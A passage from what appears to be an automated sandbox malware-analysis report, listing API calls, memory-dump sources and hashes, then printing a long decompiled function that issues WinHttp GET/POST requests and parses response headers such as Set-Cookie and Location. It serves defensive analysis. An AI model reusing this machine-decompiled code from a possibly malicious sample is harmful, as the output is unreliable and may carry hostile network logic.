                                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,?,00000000,?,00BD9B59,?,?), ref: 00BE579D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 626452242-0
                                  • Opcode ID: 0e5bc773effefb50cac619224efd897b538fc48d6514abde6979110d40868d40
                                  • Instruction ID: b3a7cf2edb09473ffccf76e3f7e5306e243e4bbfbad8f72b726f3a709ad6860d
                                  • Opcode Fuzzy Hash: 0e5bc773effefb50cac619224efd897b538fc48d6514abde6979110d40868d40
                                  • Instruction Fuzzy Hash: 7C110432301216AFD6209B4ADC89F6EF799EF84764F20425AF7159B3C0CB20AC1187A0
                                  Uniqueness

                                  Uniqueness Score: 0.08%

                                  Control-flow Graph

                                  Control-flow graph of the function at 00C0C6D1 (rendered graph not reproduced; internal call targets: 00C06876, 00C068D3, 00C09972)
                                  APIs
                                    • Part of subcall function 00C06876: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C0710F,00000001,00000364,00000006,000000FF,?,?,?,00C0185C,00C06950), ref: 00C068B7
                                  • _free.LIBCMT ref: 00C0C740
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap_free
                                  • String ID:
                                  • API String ID: 614378929-0
                                  • Opcode ID: a30e8605a2eb8de14869478dd35ca90c301679f309bffa3130f202b4217855f8
                                  • Instruction ID: 726449149e039d56a40967bc445cb45d0cbc4cfbe658db81551cfe2246b693f5
                                  • Opcode Fuzzy Hash: a30e8605a2eb8de14869478dd35ca90c301679f309bffa3130f202b4217855f8
                                  • Instruction Fuzzy Hash: C801F972A043566BC721CF98D8C199AFB98EB053B0F150769E565B76C0E770AD10CBA4
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Control-flow Graph

                                  Control-flow graph of the function at 00C06876 (rendered graph not reproduced; internal call targets: 00C01857, 00C051E3, 00C027BF; Win32 calls: RtlAllocateHeap)
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C0710F,00000001,00000364,00000006,000000FF,?,?,?,00C0185C,00C06950), ref: 00C068B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 952dd83fd909b54e25898e6406f37245199fc2b010e1db7aa93a9cbb94a152ef
                                  • Instruction ID: e45f3c6566bf66a6935efbdcfc0984c405d7eac568a307e5a07bcc652e7bd2ec
                                  • Opcode Fuzzy Hash: 952dd83fd909b54e25898e6406f37245199fc2b010e1db7aa93a9cbb94a152ef
                                  • Instruction Fuzzy Hash: 35F0BE316002246BEB212F62DC09F5A7748AB41770F18C321EC28A61D0CA30EA26D7B0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  Control-flow graph of the function at 00C0690D (rendered graph not reproduced; internal call targets: 00C01857, 00C051E3, 00C027BF; Win32 calls: RtlAllocateHeap)
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00BF48E0,?,?,00BE8B4A,?,?,00BD1154), ref: 00C0693F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: a7880056ec5d177290b10d27f97063bf49d9722ef9ef9d0dfff90b1bb282015d
                                  • Instruction ID: 3cf6e58dcc8bbbc974f97b64762984201c3aaaa1cdc544171c474762430a11a2
                                  • Opcode Fuzzy Hash: a7880056ec5d177290b10d27f97063bf49d9722ef9ef9d0dfff90b1bb282015d
                                  • Instruction Fuzzy Hash: C7E06D3120522166DA322E669D04F5F7A889B427B0F194124EC25979D4DA30DE21D6A1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Non-executed Functions

                                  C-Code - Quality: 53%
                                  			E00BD5230(void* __ebx, signed int* __ecx, void* __edx, void* __edi, signed int __esi, char _a4, signed int _a20, intOrPtr _a24) {
                                  				signed int _v4;
                                  				int _v8;
                                  				intOrPtr _v12;
                                  				unsigned int _v13;
                                  				signed char _v14;
                                  				unsigned char _v15;
                                  				signed char _v16;
                                  				char _v17;
                                  				unsigned int _v18;
                                  				unsigned char _v19;
                                  				signed int _v20;
                                  				signed char _v21;
                                  				char _v22;
                                  				signed char _v23;
                                  				unsigned char _v24;
                                  				intOrPtr _v25;
                                  				unsigned char _v26;
                                  				signed char _v28;
                                  				signed char _v32;
                                  				signed int _v36;
                                  				signed char _v40;
                                  				signed char _v44;
                                  				signed int _v48;
                                  				intOrPtr _v52;
                                  				intOrPtr _v56;
                                  				signed int _v60;
                                  				unsigned char _v64;
                                  				intOrPtr _v68;
                                  				signed int _v84;
                                  				unsigned char _v88;
                                  				unsigned char _v92;
                                  				intOrPtr _v132;
                                  				signed int _v140;
                                  				signed char _v144;
                                  				char _v164;
                                  				intOrPtr _v168;
                                  				intOrPtr _v180;
                                  				intOrPtr _v184;
                                  				unsigned char _v188;
                                  				intOrPtr _v196;
                                  				int _v208;
                                  				char _v216;
                                  				signed int _v220;
                                  				char _v348;
                                  				void* _v352;
                                  				unsigned char _v356;
                                  				char _v540;
                                  				char _v1060;
                                  				char _v1580;
                                  				char _v4180;
                                  				signed int _v4184;
                                  				int _v4188;
                                  				void* _v4192;
                                  				char _v4196;
                                  				char _v4204;
                                  				signed int _v4208;
                                  				intOrPtr _v4212;
                                  				char _v4228;
                                  				signed int _v4232;
                                  				int _v4236;
                                  				char _v4252;
                                  				signed int _v4256;
                                  				int _v4260;
                                  				short _v4276;
                                  				int _v4280;
                                  				char _v4281;
                                  				signed int _v4288;
                                  				int _v4292;
                                  				signed int _v4296;
                                  				char _v4297;
                                  				signed int _v4304;
                                  				signed int _v4308;
                                  				int _v4312;
                                  				int _v4316;
                                  				int _v4320;
                                  				int _v4324;
                                  				int _v4328;
                                  				int _v4332;
                                  				long _v4336;
                                  				signed int _v4340;
                                  				short* _v4344;
                                  				signed int* _v4348;
                                  				signed int _v4352;
                                  				void* _v4356;
                                  				void* _v4360;
                                  				char _v4364;
                                  				char* _v4368;
                                  				char* _v4372;
                                  				signed int _v4376;
                                  				int _v4380;
                                  				char* _v4384;
                                  				signed int _v4388;
                                  				int _v4392;
                                  				int _v4396;
                                  				int _v4400;
                                  				signed int _v4404;
                                  				int _v4408;
                                  				signed int _v4412;
                                  				intOrPtr _v4424;
                                  				char* _v4428;
                                  				int _v4432;
                                  				intOrPtr _v4448;
                                  				intOrPtr _v4452;
                                  				char* _v4456;
                                  				int _v4460;
                                  				int _v4464;
                                  				int _v4468;
                                  				char _v4472;
                                  				void* __ebp;
                                  				signed int _t682;
                                  				signed int _t683;
                                  				char _t685;
                                  				signed int _t689;
                                  				signed int _t692;
                                  				long _t693;
                                  				intOrPtr _t696;
                                  				signed int _t702;
                                  				signed int _t703;
                                  				intOrPtr _t711;
                                  				intOrPtr _t714;
                                  				signed char _t724;
                                  				unsigned char _t727;
                                  				signed int _t730;
                                  				unsigned char _t735;
                                  				signed int _t739;
                                  				signed int _t743;
                                  				void* _t744;
                                  				signed int _t751;
                                  				signed int _t754;
                                  				signed int _t756;
                                  				char _t757;
                                  				signed char _t758;
                                  				signed int _t760;
                                  				signed int _t767;
                                  				signed int _t768;
                                  				signed int _t772;
                                  				intOrPtr _t774;
                                  				intOrPtr* _t776;
                                  				char _t781;
                                  				signed char _t782;
                                  				signed char _t785;
                                  				unsigned char _t794;
                                  				signed char _t798;
                                  				signed char _t822;
                                  				signed int _t824;
                                  				char* _t829;
                                  				signed int _t837;
                                  				signed int _t838;
                                  				signed int _t841;
                                  				long _t842;
                                  				signed int _t843;
                                  				long _t844;
                                  				signed int _t845;
                                  				signed int _t850;
                                  				signed int _t852;
                                  				signed int _t857;
                                  				signed int _t862;
                                  				signed int* _t864;
                                  				signed int _t865;
                                  				signed int _t873;
                                  				signed int _t879;
                                  				intOrPtr _t880;
                                  				int _t888;
                                  				intOrPtr _t894;
                                  				signed int _t904;
                                  				signed int _t907;
                                  				signed int _t919;
                                  				signed int _t933;
                                  				signed int _t936;
                                  				signed int _t942;
                                  				signed int _t945;
                                  				signed int _t948;
                                  				signed int _t954;
                                  				intOrPtr _t960;
                                  				intOrPtr _t964;
                                  				signed int _t971;
                                  				signed int _t972;
                                  				signed int _t976;
                                  				void* _t980;
                                  				signed int _t983;
                                  				intOrPtr _t985;
                                  				intOrPtr _t989;
                                  				intOrPtr* _t998;
                                  				signed int _t1004;
                                  				signed int _t1007;
                                  				intOrPtr* _t1012;
                                  				signed int _t1015;
                                  				signed int _t1016;
                                  				void* _t1017;
                                  				signed int _t1024;
                                  				void* _t1025;
                                  				void* _t1026;
                                  				signed int _t1035;
                                  				signed int _t1036;
                                  				void* _t1037;
                                  				void* _t1038;
                                  				signed int* _t1044;
                                  				signed int _t1048;
                                  				signed int _t1049;
                                  				intOrPtr _t1056;
                                  				signed int _t1060;
                                  				void* _t1062;
                                  				signed int _t1064;
                                  				intOrPtr _t1065;
                                  				void* _t1067;
                                  				signed char _t1068;
                                  				signed char _t1070;
                                  				unsigned char _t1071;
                                  				void* _t1074;
                                  				void* _t1076;
                                  				signed int* _t1078;
                                  				unsigned char _t1088;
                                  				signed int _t1097;
                                  				void* _t1099;
                                  				unsigned char _t1100;
                                  				intOrPtr _t1101;
                                  				unsigned char _t1108;
                                  				intOrPtr* _t1110;
                                  				signed int _t1113;
                                  				intOrPtr _t1121;
                                  				unsigned char _t1124;
                                  				char _t1130;
                                  				signed char _t1134;
                                  				signed char _t1136;
                                  				signed char _t1137;
                                  				intOrPtr _t1138;
                                  				void* _t1139;
                                  				unsigned char _t1143;
                                  				intOrPtr _t1146;
                                  				signed int _t1149;
                                  				intOrPtr* _t1152;
                                  				long _t1158;
                                  				signed int _t1160;
                                  				intOrPtr* _t1184;
                                  				char* _t1185;
                                  				int _t1187;
                                  				char _t1188;
                                  				signed int _t1189;
                                  				void* _t1190;
                                  				char* _t1191;
                                  				short* _t1193;
                                  				signed int _t1194;
                                  				unsigned int _t1197;
                                  				unsigned int _t1199;
                                  				int _t1201;
                                  				intOrPtr* _t1203;
                                  				signed int _t1204;
                                  				intOrPtr* _t1207;
                                  				char* _t1212;
                                  				char* _t1214;
                                  				char* _t1216;
                                  				signed int _t1219;
                                  				signed int _t1220;
                                  				void* _t1221;
                                  				char _t1222;
                                  				intOrPtr _t1228;
                                  				intOrPtr _t1229;
                                  				intOrPtr* _t1232;
                                  				char* _t1233;
                                  				signed int* _t1242;
                                  				signed int* _t1243;
                                  				signed int _t1245;
                                  				intOrPtr _t1247;
                                  				void* _t1248;
                                  				signed int _t1249;
                                  				intOrPtr _t1250;
                                  				unsigned int _t1251;
                                  				unsigned char _t1258;
                                  				signed char _t1259;
                                  				signed char _t1263;
                                  				signed int _t1266;
                                  				signed char _t1267;
                                  				intOrPtr _t1268;
                                  				signed char _t1272;
                                  				void* _t1273;
                                  				unsigned char _t1278;
                                  				void* _t1283;
                                  				char _t1287;
                                  				unsigned char _t1288;
                                  				signed char _t1294;
                                  				intOrPtr _t1295;
                                  				signed int _t1296;
                                  				void* _t1304;
                                  				signed int _t1311;
                                  				signed int _t1312;
                                  				intOrPtr* _t1315;
                                  				int _t1316;
                                  				signed int _t1318;
                                  				short* _t1319;
                                  				signed int _t1320;
                                  				signed int _t1321;
                                  				intOrPtr* _t1322;
                                  				signed int _t1324;
                                  				signed int _t1325;
                                  				signed int _t1326;
                                  				void* _t1327;
                                  				void* _t1328;
                                  				signed int* _t1330;
                                  				signed int _t1332;
                                  				char _t1334;
                                  				signed char _t1336;
                                  				signed int _t1339;
                                  				signed int _t1342;
                                  				void* _t1344;
                                  				unsigned char _t1346;
                                  				unsigned char _t1347;
                                  				signed int _t1348;
                                  				signed int _t1349;
                                  				unsigned char _t1351;
                                  				unsigned char _t1353;
                                  				signed int _t1355;
                                  				signed int _t1356;
                                  				signed int _t1360;
                                  				unsigned char _t1362;
                                  				intOrPtr _t1364;
                                  				signed int _t1365;
                                  				intOrPtr* _t1366;
                                  				signed int _t1367;
                                  				int _t1368;
                                  				int _t1369;
                                  				short* _t1370;
                                  				signed int _t1371;
                                  				signed int _t1374;
                                  				signed int _t1375;
                                  				signed int _t1378;
                                  				signed int _t1379;
                                  				void* _t1380;
                                  				void* _t1381;
                                  				signed int _t1382;
                                  				void* _t1383;
                                  				signed int _t1384;
                                  				void* _t1386;
                                  				void* _t1388;
                                  				signed int _t1389;
                                  				void* _t1392;
                                  				void* _t1393;
                                  				void* _t1394;
                                  				void* _t1395;
                                  				void* _t1396;
                                  				void* _t1397;
                                  				void* _t1400;
                                  				void* _t1401;
                                  
                                  				_t1349 = __esi;
                                  				_t1248 = __edx;
                                  				_t1062 = __ebx;
                                  				_push(0xffffffff);
                                  				_push(0xc16ed2);
                                  				_push( *[fs:0x0]);
                                  				E00C16440();
                                  				_t682 =  *0xc2e00c; // 0x5cb9e59c
                                  				_t683 = _t682 ^ _t1378;
                                  				_v20 = _t683;
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_push(_t683);
                                  				 *[fs:0x0] =  &_v16;
                                  				_t1330 = __ecx;
                                  				_v4348 = __ecx;
                                  				_t685 = _a4;
                                  				if(__ecx[6] > 0) {
                                  					E00BE5D90( &_v4228, _t685);
                                  					_v8 = 0;
                                  					__eflags = _v4208 - 8;
                                  					_t688 =  >=  ? _v4228 :  &_v4228;
                                  					_t689 = E00BFD709(__ecx, __esi,  >=  ? _v4228 :  &_v4228, L"GET");
                                  					_t1384 = _t1383 + 8;
                                  					__eflags = _t689;
                                  					if(_t689 != 0) {
                                  						__eflags = _v4208 - 8;
                                  						_t691 =  >=  ? _v4228 :  &_v4228;
                                  						_t692 = E00BFD709(_t1330, __esi,  >=  ? _v4228 :  &_v4228, L"POST");
                                  						_t1384 = _t1384 + 8;
                                  						__eflags = _t692;
                                  						if(_t692 != 0) {
                                  							_t693 = 0x57;
                                  							goto L213;
                                  						} else {
                                  							_t829 = L"POST";
                                  							_t1149 = 4;
                                  							goto L6;
                                  						}
                                  					} else {
                                  						_t829 = L"GET";
                                  						_t1149 = 3;
                                  						L6:
                                  						_push(_t1149);
                                  						E00BE7B00(_t1062,  &_v4228, _t1248, _t1330, _t829);
                                  						__eflags =  *_t1330;
                                  						_v4281 = 1;
                                  						if( *_t1330 != 0) {
                                  							L11:
                                  							__imp__WinHttpSetTimeouts( *_t1330, _t1330[0x5e], _t1330[0x5f], _t1330[0x60], _t1330[0x61]);
                                  							E00BF71C0(_t1330,  &_v1060, 0, 0x208);
                                  							E00BF71C0(_t1330,  &_v4180, 0, 0xa28);
                                  							_v4468 = 0;
                                  							_v4456 =  &_v1060;
                                  							asm("xorps xmm0, xmm0");
                                  							_v4460 = 0;
                                  							_t1384 = _t1384 + 0x18;
                                  							_v4428 =  &_v4180;
                                  							__eflags = _t1330[7] - 8;
                                  							_t837 =  &(_t1330[2]);
                                  							asm("movlpd [ebp-0x115c], xmm0");
                                  							asm("movlpd [ebp-0x1154], xmm0");
                                  							_v4432 = 0;
                                  							asm("movlpd [ebp-0x1140], xmm0");
                                  							_v4472 = 0x3c;
                                  							_v4452 = 0x104;
                                  							_v4424 = 0x514;
                                  							_v4464 = 1;
                                  							if(_t1330[7] >= 8) {
                                  								_t837 = _t1330[2];
                                  							}
                                  							__imp__WinHttpCrackUrl(_t837, _t1330[6], 0,  &_v4472);
                                  							__eflags = _t837;
                                  							if(_t837 == 0) {
                                  								goto L214;
                                  							} else {
                                  								_t1152 =  &_v1060;
                                  								_t1304 = _t1152 + 2;
                                  								do {
                                  									_t838 =  *_t1152;
                                  									_t1152 = _t1152 + 2;
                                  									__eflags = _t838;
                                  								} while (_t838 != 0);
                                  								E00BE7B00(_t1062,  &(_t1330[8]), _t1304, _t1330,  &_v1060);
                                  								_t841 =  &_v1060;
                                  								__imp__WinHttpConnect( *_t1330, _t841, _v4448, 0, _t1152 - _t1304 >> 1);
                                  								_v4352 = _t841;
                                  								__eflags = _t841;
                                  								if(_t841 == 0) {
                                  									goto L214;
                                  								} else {
                                  									__eflags = _v4460 - 2;
                                  									_t1157 =  ==  ? 0x800000 : 0;
                                  									__eflags = _v4208 - 8;
                                  									_t1307 =  >=  ? _v4228 :  &_v4228;
                                  									__imp__WinHttpOpenRequest(_t841,  >=  ? _v4228 :  &_v4228, _v4428, 0, 0, 0,  ==  ? 0x800000 : 0);
                                  									_t1349 = _t841;
                                  									_v4296 = _t1349;
                                  									__eflags = _t1349;
                                  									if(_t1349 == 0) {
                                  										L211:
                                  										__imp__WinHttpCloseHandle(_v4352);
                                  										goto L214;
                                  									} else {
                                  										__eflags = _t1330[1];
                                  										if(_t1330[1] == 0) {
                                  											__eflags = _v4460 - 2;
                                  											if(_v4460 == 2) {
                                  												_v4280 = 0x3100;
                                  												__imp__WinHttpSetOption(_t1349, 0x1f,  &_v4280, 4);
                                  											}
                                  										}
                                  										_t1158 = 0;
                                  										__eflags = 0;
                                  										while(1) {
                                  											L22:
                                  											_t842 = _t1158;
                                  											_v4336 = _t1158 + 1;
                                  											__eflags = _t842 - 3;
                                  											if(_t842 >= 3) {
                                  												break;
                                  											} else {
                                  												_t1160 = _t1330[0x36];
                                  												__eflags = _t1160;
                                  												if(_t1160 != 0) {
                                  													__eflags = _t1330[0x37] - 8;
                                  													_t842 =  &(_t1330[0x32]);
                                  													if(_t1330[0x37] >= 8) {
                                  														_t842 =  *_t842;
                                  													}
                                  													__imp__WinHttpAddRequestHeaders(_t1349, _t842, _t1160, 0x1000000);
                                  													__eflags = _t842;
                                  													if(_t842 == 0) {
                                  														_t842 = GetLastError();
                                  														_t1330[0x3e] = _t842;
                                  													}
                                  												}
                                  											}
                                  											__eflags = _t1330[0x2e];
                                  											if(_t1330[0x2e] <= 0) {
                                  												L37:
                                  												__eflags = _t1330[0x3c];
                                  												if(_t1330[0x3c] > 0) {
                                  													_v4380 = 0;
                                  													_v4388 = 3;
                                  													E00BF71C0(_t1330,  &_v540, 0, 0x208);
                                  													_t1044 =  &(_t1330[0x38]);
                                  													_t1392 = _t1384 + 0xc;
                                  													__eflags = _t1044[5] - 8;
                                  													if(_t1044[5] >= 8) {
                                  														_t1044 =  *_t1044;
                                  													}
                                  													E00C00FED( &_v540, 0x104, _t1044);
                                  													_t1384 = _t1392 + 0xc;
                                  													_v4384 =  &_v540;
                                  													_t1048 =  &_v4388;
                                  													__imp__WinHttpSetOption(_t1349, 0x26, _t1048, 0xc);
                                  													__eflags = _t1048;
                                  													if(_t1048 == 0) {
                                  														_t1330[0x3e] = GetLastError();
                                  													}
                                  													_t842 = _t1330[0x50];
                                  													__eflags = _t842;
                                  													if(_t842 != 0) {
                                  														__eflags = _t1330[0x51] - 8;
                                  														_t1242 =  &(_t1330[0x4c]);
                                  														if(_t1330[0x51] >= 8) {
                                  															_t1242 =  *_t1242;
                                  														}
                                  														_t1049 = _t842 + _t842;
                                  														__imp__WinHttpSetOption(_t1349, 0x1002, _t1242, _t1049);
                                  														__eflags = _t1049;
                                  														if(_t1049 == 0) {
                                  															_t1330[0x3e] = GetLastError();
                                  														}
                                  														_t842 = _t1330[0x56];
                                  														__eflags = _t842;
                                  														if(_t842 != 0) {
                                  															__eflags = _t1330[0x57] - 8;
                                  															_t1243 =  &(_t1330[0x52]);
                                  															if(_t1330[0x57] >= 8) {
                                  																_t1243 =  *_t1243;
                                  															}
                                  															_t842 = _t842 + _t842;
                                  															__imp__WinHttpSetOption(_t1349, 0x1003, _t1243, _t842);
                                  															__eflags = _t842;
                                  															if(_t842 == 0) {
                                  																_t842 = GetLastError();
                                  																_t1330[0x3e] = _t842;
                                  															}
                                  														}
                                  													}
                                  												}
                                  												_v4340 = 0;
                                  												__imp__WinHttpSendRequest(_t1349, 0, 0, 0, 0, 0, 0);
                                  												__eflags = _t842;
                                  												if(_t842 != 0) {
                                  													L76:
                                  													_t843 = _t1330[0x30];
                                  													__eflags = _t843;
                                  													if(_t843 != 0) {
                                  														_v4280 = 0;
                                  														__imp__WinHttpWriteData(_t1349, _t843, _t1330[0x31],  &_v4280);
                                  														__eflags = _t843;
                                  														if(_t843 == 0) {
                                  															_t843 = GetLastError();
                                  															_t1330[0x3e] = _t843;
                                  														}
                                  													}
                                  													__imp__WinHttpReceiveResponse(_t1349, 0);
                                  													__eflags = _t843;
                                  													if(_t843 == 0) {
                                  														goto L207;
                                  													} else {
                                  														_t845 =  &_v4288;
                                  														_v4288 = 0;
                                  														__imp__WinHttpQueryHeaders(_t1349, 0x16, 0, 0, _t845, 0);
                                  														__eflags = _t845;
                                  														if(__eflags != 0) {
                                  															L82:
                                  															_t1309 = _v4288 * 2 >> 0x20;
                                  															_t1365 = E00BF4B55(_v4288 * 2 >> 0x20, __eflags,  ~(0 | __eflags > 0x00000000) | _v4288 * 0x00000002);
                                  															_v4308 = _t1365;
                                  															E00BF71C0(_t1330, _t1365, 0, _v4288 + _v4288);
                                  															_t1393 = _t1384 + 0x10;
                                  															_t850 =  &_v4288;
                                  															__imp__WinHttpQueryHeaders(_v4296, 0x16, 0, _t1365, _t850, 0);
                                  															__eflags = _t850;
                                  															if(_t850 == 0) {
                                  																L143:
                                  																E00BF44E1(_t1365);
                                  																_t1349 = _v4296;
                                  																_t1384 = _t1393 + 4;
                                  																goto L144;
                                  															} else {
                                  																_t1207 = _t1365;
                                  																_t162 = _t1207 + 2; // 0x2
                                  																_t1322 = _t162;
                                  																do {
                                  																	_t936 =  *_t1207;
                                  																	_t1207 = _t1207 + 2;
                                  																	__eflags = _t936;
                                  																} while (_t936 != 0);
                                  																_t1373 =  &(_t1330[0xe]);
                                  																_push(_t1207 - _t1322 >> 1);
                                  																E00BE7B00(_t1062,  &(_t1330[0xe]), _t1322, _t1330, _v4308);
                                  																_v4320 = 0;
                                  																_v4316 = 0;
                                  																_v4312 = 0;
                                  																_v8 = 2;
                                  																_push(0);
                                  																_v4188 = 0;
                                  																_v4184 = 7;
                                  																_v4204 = 0;
                                  																E00BE7B00(_t1062,  &_v4204, _t1322, _t1330, 0xc2685c);
                                  																_v8 = 3;
                                  																__eflags = _t1330[0x4b];
                                  																if(_t1330[0x4b] == 0) {
                                  																	_push(0x19);
                                  																	_t1233 =  &_v4204;
                                  																	E00BE7B00(_t1062, _t1233, _t1322, _t1330, L"charset={[A-Za-z0-9\\-_]+}");
                                  																	_push(_t1233);
                                  																	_t1007 = E00BD4300(_t1062,  &_v4204, _t1330, _t1373, _t1233, _t1373,  &_v4320);
                                  																	_t1393 = _t1393 + 0x10;
                                  																	__eflags = _t1007;
                                  																	if(_t1007 != 0) {
                                  																		_t1322 = _v4320;
                                  																		__eflags = (_v4316 - _t1322 >> 3) * 0xaaaaaaab;
                                  																		if((_v4316 - _t1322 >> 3) * 0xaaaaaaab != 0) {
                                  																			_t1235 =  &(_t1330[0x1a]);
                                  																			__eflags =  &(_t1330[0x1a]) - _t1322;
                                  																			if( &(_t1330[0x1a]) != _t1322) {
                                  																				__eflags =  *((intOrPtr*)(_t1322 + 0x14)) - 8;
                                  																				_t1012 = _t1322;
                                  																				if( *((intOrPtr*)(_t1322 + 0x14)) >= 8) {
                                  																					_t1012 =  *_t1322;
                                  																				}
                                  																				_push( *((intOrPtr*)(_t1322 + 0x10)));
                                  																				E00BE7B00(_t1062, _t1235, _t1322, _t1330, _t1012);
                                  																			}
                                  																		}
                                  																	}
                                  																}
                                  																_push(0x18);
                                  																_t1212 =  &_v4204;
                                  																E00BE7B00(_t1062, _t1212, _t1322, _t1330, L"Content-Length: {[0-9]+}");
                                  																_push(_t1212);
                                  																_t942 = E00BD4300(_t1062,  &_v4204, _t1330, _t1373, _t1212, _t1373,  &_v4320);
                                  																_t1400 = _t1393 + 0x10;
                                  																__eflags = _t942;
                                  																if(_t942 != 0) {
                                  																	_t1232 = _v4320;
                                  																	__eflags = (_v4316 - _t1232 >> 3) * 0xaaaaaaab;
                                  																	if((_v4316 - _t1232 >> 3) * 0xaaaaaaab != 0) {
                                  																		__eflags =  *((intOrPtr*)(_t1232 + 0x14)) - 8;
                                  																		if( *((intOrPtr*)(_t1232 + 0x14)) >= 8) {
                                  																			_t1232 =  *_t1232;
                                  																		}
                                  																		_t1004 = E00C00FCA(_t1232, _t1232);
                                  																		_t1400 = _t1400 + 4;
                                  																		_t1330[0x23] = _t1004;
                                  																	}
                                  																}
                                  																_push(0x12);
                                  																_t1214 =  &_v4204;
                                  																E00BE7B00(_t1062, _t1214, _t1322, _t1330, L"Location: {[0-9]+}");
                                  																_push(_t1214);
                                  																_t945 = E00BD4300(_t1062,  &_v4204, _t1330, _t1373, _t1214, _t1373,  &_v4320);
                                  																_t1401 = _t1400 + 0x10;
                                  																__eflags = _t945;
                                  																if(_t945 != 0) {
                                  																	_t1322 = _v4320;
                                  																	__eflags = (_v4316 - _t1322 >> 3) * 0xaaaaaaab;
                                  																	if((_v4316 - _t1322 >> 3) * 0xaaaaaaab != 0) {
                                  																		_t1231 =  &(_t1330[0x58]);
                                  																		__eflags =  &(_t1330[0x58]) - _t1322;
                                  																		if( &(_t1330[0x58]) != _t1322) {
                                  																			__eflags =  *((intOrPtr*)(_t1322 + 0x14)) - 8;
                                  																			_t998 = _t1322;
                                  																			if( *((intOrPtr*)(_t1322 + 0x14)) >= 8) {
                                  																				_t998 =  *_t1322;
                                  																			}
                                  																			_push( *((intOrPtr*)(_t1322 + 0x10)));
                                  																			E00BE7B00(_t1062, _t1231, _t1322, _t1330, _t998);
                                  																		}
                                  																	}
                                  																}
                                  																_push(0x15);
                                  																_t1216 =  &_v4204;
                                  																E00BE7B00(_t1062, _t1216, _t1322, _t1330, L"Set-Cookie:\\b*{.+?}\\n");
                                  																_push(_t1216);
                                  																_t948 = E00BD4300(_t1062,  &_v4204, _t1330, _t1373, _t1216, _t1373,  &_v4320);
                                  																_t1349 = _v4320;
                                  																_t1393 = _t1401 + 0x10;
                                  																_v4292 = _t1349;
                                  																__eflags = _t948;
                                  																if(_t948 == 0) {
                                  																	L125:
                                  																	_v8 = 2;
                                  																	_t1309 = _v4184;
                                  																	__eflags = _t1309 - 8;
                                  																	if(_t1309 < 8) {
                                  																		L129:
                                  																		_v4188 = 0;
                                  																		_v4184 = 7;
                                  																		_v4204 = 0;
                                  																		_v8 = 0;
                                  																		__eflags = _t1349;
                                  																		if(_t1349 == 0) {
                                  																			L142:
                                  																			_t1365 = _v4308;
                                  																			goto L143;
                                  																		} else {
                                  																			__eflags = _t1349 - _v4316;
                                  																			if(_t1349 == _v4316) {
                                  																				L139:
                                  																				_t954 = _t1349;
                                  																				_t1219 = (_v4312 - _t1349 >> 3) * 0xaaaaaaab + (_v4312 - _t1349 >> 3) * 0xaaaaaaab * 2 << 3;
                                  																				__eflags = _t1219 - 0x1000;
                                  																				if(_t1219 < 0x1000) {
                                  																					L141:
                                  																					_push(_t1219);
                                  																					E00BF4B47(_t1349);
                                  																					_t1393 = _t1393 + 8;
                                  																					_v4320 = 0;
                                  																					_v4316 = 0;
                                  																					_v4312 = 0;
                                  																					goto L142;
                                  																				} else {
                                  																					_t1349 =  *(_t1349 - 4);
                                  																					_t1085 = _t1219 + 0x23;
                                  																					__eflags = _t954 - _t1349 + 0xfffffffc - 0x1f;
                                  																					if(__eflags > 0) {
                                  																						goto L220;
                                  																					} else {
                                  																						goto L141;
